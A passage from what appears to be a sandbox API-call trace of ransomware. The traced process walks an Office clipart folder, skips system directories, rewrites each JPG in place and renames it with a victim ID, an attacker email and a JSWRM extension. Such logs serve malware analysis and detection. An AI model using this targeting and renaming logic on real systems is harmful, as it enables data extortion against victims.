lpDistanceToMoveHigh=0x0) returned 0x0 [0090.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1a9e0) returned 0x24d210 [0090.113] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x1a9e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x1a9e0, lpOverlapped=0x0) returned 1 [0090.122] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.122] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x1a9e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x1a9e0, lpOverlapped=0x0) returned 1 [0090.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0090.123] CloseHandle (hObject=0x314) returned 1 [0090.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0090.124] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0090.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0090.124] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0090.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0090.124] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0090.124] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0090.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0090.124] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0090.124] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0090.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0090.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0090.124] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0090.124] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0090.124] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382957.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382957.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382957.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382957.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0090.125] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0090.125] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0090.125] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0090.125] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4c596d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf4c596d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf4c596d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x193e7, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0382958.JPG", cAlternateFileName="")) returned 1 [0090.125] lstrcmpiW (lpString1="J0382958.JPG", lpString2=".") returned 1 [0090.125] lstrcmpiW (lpString1="J0382958.JPG", lpString2="..") returned 1 [0090.125] lstrcmpiW (lpString1="J0382958.JPG", lpString2="...") returned 1 [0090.125] lstrcmpiW (lpString1="J0382958.JPG", lpString2="windows") returned -1 [0090.125] lstrcmpiW (lpString1="J0382958.JPG", lpString2="recovery") returned -1 [0090.125] lstrcmpiW (lpString1="J0382958.JPG", lpString2="perflogs") returned -1 [0090.125] lstrcmpiW (lpString1="J0382958.JPG", lpString2="documents and settings") returned 1 [0090.125] lstrcmpiW (lpString1="J0382958.JPG", lpString2="$RECYCLE.BIN") returned 1 [0090.125] lstrcmpiW (lpString1="J0382958.JPG", lpString2="system volume information") returned -1 [0090.125] lstrcmpiW (lpString1="J0382958.JPG", lpString2="msocache") returned -1 [0090.125] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0090.125] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382958.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.125] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382958.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0382958.JPG", lpUsedDefaultChar=0x0) returned 12 [0090.125] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0090.125] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0090.125] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382958.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.125] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382958.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0382958.JPG", lpUsedDefaultChar=0x0) returned 12 [0090.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0090.126] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0090.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0090.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0090.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0090.126] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0090.126] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382958.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382958.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0090.126] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=103399) returned 1 [0090.155] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.155] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x193e0) returned 0x24d210 [0090.156] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x193e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x193e0, lpOverlapped=0x0) returned 1 [0090.165] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.165] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x193e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x193e0, lpOverlapped=0x0) returned 1 [0090.165] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0090.166] CloseHandle (hObject=0x314) returned 1 [0090.166] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0090.166] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0090.166] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0090.166] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0090.166] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0090.166] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0090.166] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0090.166] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0090.166] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0090.166] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0090.166] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0090.166] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0090.166] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0090.166] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0090.167] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382958.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382958.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382958.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382958.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0090.168] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0090.168] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0090.168] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0090.168] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf58455c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf58455c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf5aa7bb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x14f8a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0382959.JPG", cAlternateFileName="")) returned 1 [0090.168] lstrcmpiW (lpString1="J0382959.JPG", lpString2=".") returned 1 [0090.168] lstrcmpiW (lpString1="J0382959.JPG", lpString2="..") returned 1 [0090.168] lstrcmpiW (lpString1="J0382959.JPG", lpString2="...") returned 1 [0090.168] lstrcmpiW (lpString1="J0382959.JPG", lpString2="windows") returned -1 [0090.168] lstrcmpiW (lpString1="J0382959.JPG", lpString2="recovery") returned -1 [0090.168] lstrcmpiW (lpString1="J0382959.JPG", lpString2="perflogs") returned -1 [0090.168] lstrcmpiW (lpString1="J0382959.JPG", lpString2="documents and settings") returned 1 [0090.168] lstrcmpiW (lpString1="J0382959.JPG", lpString2="$RECYCLE.BIN") returned 1 [0090.168] lstrcmpiW (lpString1="J0382959.JPG", lpString2="system volume information") returned -1 [0090.168] lstrcmpiW (lpString1="J0382959.JPG", lpString2="msocache") returned -1 [0090.168] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0090.168] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382959.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.168] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382959.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0382959.JPG", lpUsedDefaultChar=0x0) returned 12 [0090.168] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0090.168] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0090.168] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382959.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.168] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382959.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0382959.JPG", lpUsedDefaultChar=0x0) returned 12 [0090.168] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0090.168] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0090.168] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0090.168] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0090.168] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0090.168] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0090.168] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382959.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382959.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0090.169] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=85898) returned 1 [0090.169] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.169] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14f80) returned 0x24d210 [0090.170] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x14f80, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x14f80, lpOverlapped=0x0) returned 1 [0090.177] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.177] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x14f80, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x14f80, lpOverlapped=0x0) returned 1 [0090.178] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0090.179] CloseHandle (hObject=0x314) returned 1 [0090.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0090.179] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0090.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0090.179] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0090.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0090.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0090.179] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0090.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0090.179] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0090.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0090.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0090.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0090.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0090.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0090.179] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382959.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382959.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382959.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382959.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0090.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0090.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0090.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0090.181] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4ebbf4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf4ebbf4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf4ebbf4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1a3f4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0382960.JPG", cAlternateFileName="")) returned 1 [0090.181] lstrcmpiW (lpString1="J0382960.JPG", lpString2=".") returned 1 [0090.181] lstrcmpiW (lpString1="J0382960.JPG", lpString2="..") returned 1 [0090.181] lstrcmpiW (lpString1="J0382960.JPG", lpString2="...") returned 1 [0090.181] lstrcmpiW (lpString1="J0382960.JPG", lpString2="windows") returned -1 [0090.181] lstrcmpiW (lpString1="J0382960.JPG", lpString2="recovery") returned -1 [0090.181] lstrcmpiW (lpString1="J0382960.JPG", lpString2="perflogs") returned -1 [0090.181] lstrcmpiW (lpString1="J0382960.JPG", lpString2="documents and settings") returned 1 [0090.181] lstrcmpiW (lpString1="J0382960.JPG", lpString2="$RECYCLE.BIN") returned 1 [0090.181] lstrcmpiW (lpString1="J0382960.JPG", lpString2="system volume information") returned -1 [0090.181] lstrcmpiW (lpString1="J0382960.JPG", lpString2="msocache") returned -1 [0090.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0090.181] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382960.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.181] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382960.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0382960.JPG", lpUsedDefaultChar=0x0) returned 12 [0090.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0090.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0090.181] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382960.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.181] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382960.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0382960.JPG", lpUsedDefaultChar=0x0) returned 12 [0090.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0090.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0090.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0090.181] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0090.181] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0090.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0090.181] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382960.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382960.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0090.182] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=107508) returned 1 [0090.182] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.182] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1a3f0) returned 0x24d210 [0090.183] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x1a3f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x1a3f0, lpOverlapped=0x0) returned 1 [0090.192] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.192] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x1a3f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x1a3f0, lpOverlapped=0x0) returned 1 [0090.193] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0090.194] CloseHandle (hObject=0x314) returned 1 [0090.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0090.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0090.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0090.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0090.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0090.194] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0090.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0090.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0090.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, 